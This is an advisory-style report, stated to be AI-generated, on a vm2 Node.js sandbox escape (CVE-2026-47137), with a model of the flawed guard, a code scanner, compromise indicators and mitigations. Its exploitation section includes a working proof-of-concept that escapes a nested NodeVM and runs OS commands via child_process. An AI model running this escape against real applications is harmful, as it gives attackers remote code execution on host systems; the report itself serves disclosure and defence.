CVE-2026-47137: JavaScript Vulnerability Analysis and Mitigation
Overview
CVE-2026-47137 is a sandbox escape vulnerability in the vm2 Node.js sandboxing library that allows unauthenticated remote attackers to achieve full Remote Code Execution (RCE) on the host system, provided attacker-controlled code is executed inside a NodeVM configured with nesting: true. It affects all versions of vm2 up to and including 3.11.3, with the fix released in version 3.11.4. The vulnerability is a bypass of the prior patch for CVE-2023-37903 (GHSA-8hg8-63c5-gwmx), published on May 18, 2026, and added to the GitHub Advisory Database on May 29, 2026. It carries a CVSS v3.1 base score of 10.0 (Critical) (GitHub Advisory, vm2 Security Advisory).
Technical Details
The root cause is an incorrect comparison (CWE-697) and improper control of dynamically-managed code resources (CWE-913) in lib/nodevm.js. The prior patch for CVE-2023-37903 added a guard at line 263 using strict equality (options.require === false) to block the dangerous combination of nesting: true and require: false. However, when the require option is omitted entirely, options.require evaluates to undefined, causing the strict equality check to fail silently. Immediately after, at line 280, the destructuring default require: requireOpts = false assigns requireOpts = false, recreating the exact insecure configuration the patch was designed to prevent — a NESTING_OVERRIDE-only resolver that exposes the vm2 package to sandbox code. The fix in v3.11.4 restructures the check to destructure options first and then evaluate nesting && !hasRealRequireConfig, where hasRealRequireConfig requires requireOpts to be a non-null object or a Resolver instance (GitHub Advisory, Patch Commit).
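To make the comparison bug concrete, the following stand-alone model reproduces only the guard logic the advisory describes and runs the vulnerable and patched shapes side by side over the option shapes that matter. This is an added example, not vm2's own code: the Resolver class is a stand-in for vm2's Resolver, the guards return a verdict object instead of throwing VMError, and the exact line numbers and surrounding code in lib/nodevm.js are not reproduced.

```javascript
// Added example: a model of the nesting/require guard in vm2's lib/nodevm.js.
// NOT vm2's code; only the comparison logic described in the advisory is kept.

// Stand-in for vm2's Resolver class (assumption: the real check uses instanceof).
class Resolver {}

// Vulnerable shape (<= 3.11.3): strict equality against the RAW option, then a
// destructuring default. An omitted `require` is undefined, so the guard does
// not fire, yet requireOpts becomes false anyway (the insecure combination).
function vulnerableGuard(options = {}) {
  if (options.nesting && options.require === false) {
    return { blocked: true, requireOpts: options.require };
  }
  const { nesting = false, require: requireOpts = false } = options;
  return { blocked: false, nesting, requireOpts };
}

// Patched shape (3.11.4): destructure FIRST, then ask whether a real require
// configuration exists. Any falsy or omitted `require` with nesting is rejected.
function patchedGuard(options = {}) {
  const { nesting = false, require: requireOpts = false } = options;
  const hasRealRequireConfig =
    (typeof requireOpts === 'object' && requireOpts !== null) ||
    requireOpts instanceof Resolver;
  if (nesting && !hasRealRequireConfig) {
    return { blocked: true, requireOpts };
  }
  return { blocked: false, nesting, requireOpts };
}

// Run both guards over constructed option shapes and report which ones block.
function compareGuards() {
  const cases = {
    omitted:       { nesting: true },                             // the CVE shape
    explicitFalse: { nesting: true, require: false },             // caught by the old patch
    nullRequire:   { nesting: true, require: null },              // typeof null === 'object'
    objectConfig:  { nesting: true, require: { builtin: [] } },   // the documented workaround
    resolver:      { nesting: true, require: new Resolver() },
    noNesting:     { require: false },                            // nesting off: nothing to block
  };
  const out = {};
  for (const [name, opts] of Object.entries(cases)) {
    out[name] = {
      vulnerable: vulnerableGuard(opts).blocked,
      patched: patchedGuard(opts).blocked,
    };
  }
  return out;
}

module.exports = { Resolver, vulnerableGuard, patchedGuard, compareGuards };
```

The interesting row is omitted: the vulnerable guard lets it through with requireOpts already equal to false, while the patched guard rejects it, and the null row shows why the patched check must test for a non-null object rather than just typeof.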
Impact
Successful exploitation results in full Remote Code Execution on the host system with the privileges of the Node.js process running the vm2 sandbox. An attacker whose code executes inside a vulnerable NodeVM({ nesting: true }) instance can escape the sandbox entirely, access any host module including child_process and fs, execute arbitrary OS commands, read or modify sensitive files, and pivot to further compromise the underlying infrastructure. The scope is marked as Changed in CVSS, reflecting that the impact extends beyond the sandboxed component to the host system (vm2 Security Advisory, GitHub Advisory).
Exploitation Steps
- Identify a vulnerable target: Locate an application using vm2 version ≤ 3.11.3 that instantiates NodeVM with nesting: true and without an explicit require config object (e.g., new NodeVM({ nesting: true })).
- Supply malicious code to the sandbox: Provide attacker-controlled JavaScript to be executed by the vulnerable NodeVM instance. This could be via a user-facing code execution feature, a plugin system, or any other mechanism that passes untrusted code to nvm.run().
- Require vm2 from inside the sandbox: Within the sandboxed code, call require('vm2') to obtain the vm2 library. This succeeds because the NESTING_OVERRIDE builtin unconditionally injects vm2 into the resolver regardless of the outer require configuration.
- Construct an unconstrained inner NodeVM: Use the obtained NodeVM constructor to create a new inner sandbox with an attacker-chosen require config: new NodeVM({ require: { builtin: ['child_process'] } }).
- Execute arbitrary OS commands: Run code in the inner VM that loads child_process and calls execSync or exec with any desired OS command, achieving full RCE as the host process user:

```javascript
// Runs inside the vulnerable outer sandbox created with new NodeVM({ nesting: true }).
// NESTING_OVERRIDE exposes the real vm2 module to sandboxed code.
const { NodeVM } = require('vm2');
// The inner sandbox is configured by the attacker, so child_process is permitted.
const inner = new NodeVM({ require: { builtin: ['child_process'] } });
// inner.run() returns the inner module.exports: here the output of `id` on the host.
module.exports = inner.run(
  "module.exports = require('child_process').execSync('id').toString()",
  'exploit.js'
);
```

Indicators of Compromise
- Logs: Node.js application logs showing unexpected calls to child_process methods (execSync, exec, spawn) originating from within a vm2 sandbox context; error logs referencing VMError related to nesting and require configuration (post-patch).
- Process: Unusual child processes spawned by the Node.js process running vm2 (e.g., /bin/sh, cmd.exe, curl, wget, python) with no expected application-level trigger; unexpected network connections initiated by the Node.js process.
- File System: New or modified files created by the Node.js process in unexpected directories (e.g., web shells, cron jobs, SSH authorized_keys modifications); unexpected reads of sensitive files such as /etc/passwd, /etc/shadow, or application secrets.
- Network: Outbound connections from the Node.js server process to unknown external IPs, particularly on non-standard ports, which may indicate reverse shell or data exfiltration activity.
- Code Review: Presence of new NodeVM({ nesting: true }) without an explicit require config object in application source code or dependencies using vm2 ≤ 3.11.3; sandbox-executed code containing require('vm2') calls.
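The code-review indicator above can be triaged mechanically. The scanner below is an added example, not part of vm2 or the advisory: it finds each new NodeVM(...) call in a source string, extracts the balanced argument text, and classifies it by whether nesting: true appears with an omitted, non-object, or object require key. It is regex-based, so it is a triage aid rather than a JavaScript parser, and the sample source it scans is constructed for the example.

```javascript
// Added example: heuristic scanner for the vulnerable NodeVM configuration
// (nesting: true with no require config). Not vm2's or the advisory's code.

// Return every `new NodeVM(` call with its balanced-paren argument text.
// Only parentheses are tracked; an unterminated call yields the remaining text.
function extractNodeVMArgs(source) {
  const found = [];
  const re = /new\s+NodeVM\s*\(/g;
  let m;
  while ((m = re.exec(source)) !== null) {
    let depth = 1;
    let i = m.index + m[0].length;
    const start = i;
    while (i < source.length && depth > 0) {
      if (source[i] === '(') depth++;
      else if (source[i] === ')') depth--;
      i++;
    }
    found.push({ offset: m.index, args: source.slice(start, i - 1) });
  }
  return found;
}

// Classify one argument block. `require: false` is already rejected by the
// CVE-2023-37903 guard but remains an unsafe combination, so it is reported
// for review rather than treated as safe.
function classifyArgs(args) {
  const nesting = /\bnesting\s*:\s*true\b/.test(args);
  const hasRequireKey = /\brequire\s*:/.test(args);
  const requireIsObject = /\brequire\s*:\s*\{/.test(args);
  if (!nesting) return 'ok';
  if (!hasRequireKey) return 'vulnerable-omitted-require';
  if (!requireIsObject) return 'review-non-object-require';
  return 'nesting-with-config';
}

// Scan a whole source file and report a 1-based line number per NodeVM call.
function scanSource(source) {
  return extractNodeVMArgs(source).map(({ offset, args }) => ({
    line: source.slice(0, offset).split('\n').length,
    verdict: classifyArgs(args),
  }));
}

// Constructed sample source (not taken from any real application).
const SAMPLE = `
const { NodeVM } = require('vm2');
const a = new NodeVM({ nesting: true });
const b = new NodeVM({ nesting: true, require: { builtin: [] } });
const c = new NodeVM({ console: 'inherit' });
const d = new NodeVM({
  nesting: true,
  require: false,
});
`;

module.exports = { extractNodeVMArgs, classifyArgs, scanSource, SAMPLE };
```

Running scanSource(SAMPLE) flags the call on line 3 as vulnerable-omitted-require, line 4 as nesting-with-config, line 5 as ok and line 6 as review-non-object-require; anything other than ok in code used with untrusted input deserves a look, since nesting: true itself is the escape hatch.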
Mitigation and Workarounds
Upgrade vm2 to version 3.11.4 or later, which restructures the security check in lib/nodevm.js to evaluate the destructured requireOpts value rather than the raw options.require input, closing the bypass for all falsy and omitted require shapes (vm2 Release). As a temporary workaround if upgrading immediately is not possible, explicitly pass a require config object when using nesting: true (e.g., new NodeVM({ nesting: true, require: { builtin: [] } })), or remove nesting: true entirely from any NodeVM configuration used with untrusted code. Note that nesting: true is fundamentally an escape hatch and should never be used with untrusted code regardless of the require setting (GitHub Advisory).
Community Response
The vulnerability received coverage from Heise Online, which reported on four critical vm2 vulnerabilities with maximum CVSS ratings being addressed in the v3.11.4 release (Heise Online). The CVE was also highlighted in community tracking resources such as Reddit's CVEWatch and security monitoring platforms including BeyondMachines, which noted the critical sandbox escape enabling remote code execution. The vulnerability was credited to researcher q1uf3ngONEKEY (vm2 Security Advisory).
Additional Resources
Source: This report was generated using AI.